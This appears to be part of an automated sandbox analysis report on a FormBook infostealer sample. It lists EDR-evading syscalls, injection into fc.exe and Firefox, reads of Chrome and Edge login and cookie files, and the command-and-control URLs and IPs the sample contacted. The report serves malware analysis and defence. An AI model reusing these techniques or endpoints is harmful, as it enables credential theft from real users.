              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014B6ACC mov eax, dword ptr fs:[00000030h]0_2_014B6ACC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014B6ACC mov eax, dword ptr fs:[00000030h]0_2_014B6ACC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460AD0 mov eax, dword ptr fs:[00000030h]0_2_01460AD0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01494AD0 mov eax, dword ptr fs:[00000030h]0_2_01494AD0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01494AD0 mov eax, dword ptr fs:[00000030h]0_2_01494AD0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149AAEE mov eax, dword ptr fs:[00000030h]0_2_0149AAEE
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149AAEE mov eax, dword ptr fs:[00000030h]0_2_0149AAEE
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146EA80 mov eax, dword ptr fs:[00000030h]0_2_0146EA80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01534A80 mov eax, dword ptr fs:[00000030h]0_2_01534A80
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01498A90 mov edx, dword ptr fs:[00000030h]0_2_01498A90
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468AA0 mov eax, dword ptr fs:[00000030h]0_2_01468AA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468AA0 mov eax, dword ptr fs:[00000030h]0_2_01468AA0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014B6AA4 mov eax, dword ptr fs:[00000030h]0_2_014B6AA4
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460D59 mov eax, dword ptr fs:[00000030h]0_2_01460D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460D59 mov eax, dword ptr fs:[00000030h]0_2_01460D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460D59 mov eax, dword ptr fs:[00000030h]0_2_01460D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468D59 mov eax, dword ptr fs:[00000030h]0_2_01468D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468D59 mov eax, dword ptr fs:[00000030h]0_2_01468D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468D59 mov eax, dword ptr fs:[00000030h]0_2_01468D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468D59 mov eax, dword ptr fs:[00000030h]0_2_01468D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468D59 mov eax, dword ptr fs:[00000030h]0_2_01468D59
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F8D6B mov eax, dword ptr fs:[00000030h]0_2_014F8D6B

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtClose: Direct from: 0x77382B6C
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\inv#12180.exeSection loaded: NULL target: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\inv#12180.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 3556Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeJump to behavior
              Source: C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: YVdkpeLSDe.exe, 00000004.00000000.2422149374.0000000001250000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359483800.0000000001251000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000007.00000002.3359843043.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
              Source: YVdkpeLSDe.exe, 00000004.00000000.2422149374.0000000001250000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359483800.0000000001251000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000007.00000002.3359843043.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: YVdkpeLSDe.exe, 00000004.00000000.2422149374.0000000001250000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359483800.0000000001251000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000007.00000002.3359843043.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: YVdkpeLSDe.exe, 00000004.00000000.2422149374.0000000001250000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000004.00000002.3359483800.0000000001251000.00000002.00000001.00040000.00000000.sdmp, YVdkpeLSDe.exe, 00000007.00000002.3359843043.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.inv#12180.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.3359525839.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3360691498.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358673454.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358452668.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2502674902.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2503026134.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3359820951.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.inv#12180.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.3359525839.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3360691498.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358673454.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3358452668.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2502674902.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2503026134.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3359820951.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              inv#12180.exe62%VirustotalBrowse
              inv#12180.exe61%ReversingLabsWin32.Backdoor.FormBook
              inv#12180.exe100%AviraHEUR/AGEN.1318544
              inv#12180.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?58=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&AZhlI=2P00kRyHXnBDvT0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/?AZhlI=2P00kRyHXnBDvT&58=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw=0%Avira URL Cloudsafe
              http://www.investshares.net0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/?58=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&AZhlI=2P00kRyHXnBDvT0%Avira URL Cloudsafe
              http://www.gayhxi.info/k2i2/?AZhlI=2P00kRyHXnBDvT&58=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E=100%Avira URL Cloudmalware
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/?58=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&AZhlI=2P00kRyHXnBDvT0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              promocao.info
              		84.32.84.32
              		truetrue
                		unknown
                www.grimbo.boats
                		172.67.182.198
                		truetrue
                  		unknown
                  www.lonfor.website
                  		199.192.21.169
                  		truetrue
                    		unknown
                    www.gayhxi.info
                    		47.83.1.90
                    		truetrue
                      		unknown
                      www.investshares.net
                      		154.197.162.239
                      		truetrue
                        		unknown
                        zcdn.8383dns.com
                        		154.21.203.24
                        		truetrue
                          		unknown
                          www.promocao.info
                          		unknown
                          		unknownfalse
                            		unknown
                            www.44756.pizza
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.promocao.info/zaz4/?58=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&AZhlI=2P00kRyHXnBDvTtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.grimbo.boats/kxtt/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.44756.pizza/a59t/?58=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgIazDBG/TFF/REucHmN8GJFpkvs6MD1/91Qml7NfLeQ7pQK3fwg=&AZhlI=2P00kRyHXnBDvTtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.lonfor.website/bowc/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.44756.pizza/a59t/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.lonfor.website/bowc/?AZhlI=2P00kRyHXnBDvT&58=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw=true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.grimbo.boats/kxtt/?58=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvWclXvo3kWkxBBtOzLzdzXSMQ2FkkrP/66suezda9Novq3ipBd8=&AZhlI=2P00kRyHXnBDvTtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.investshares.net/cf9p/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.gayhxi.info/k2i2/?AZhlI=2P00kRyHXnBDvT&58=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E=true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.promocao.info/zaz4/true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabfc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.ecosia.org/newtab/fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.investshares.netYVdkpeLSDe.exe, 00000007.00000002.3360691498.00000000024E6000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000005.00000002.3363196622.00000000077EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              154.197.162.239
                                              		www.investshares.netSeychelles
                                              		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                              172.67.182.198
                                              		www.grimbo.boatsUnited States
                                              		13335CLOUDFLARENETUStrue
                                              199.192.21.169
                                              		www.lonfor.websiteUnited States
                                              		22612NAMECHEAP-NETUStrue
                                              47.83.1.90
                                              		www.gayhxi.infoUnited States
                                              		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                              84.32.84.32
                                              		promocao.infoLithuania
                                              		33922NTT-LT-ASLTtrue
                                              154.21.203.24
                                              		zcdn.8383dns.comUnited States
                                              		174COGENT-174UStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1583239
                                              Start date and time:2025-01-02 09:17:07 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:inv#12180.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@5/1@6/6
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 14
                                              • Number of non-executed functions: 331
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
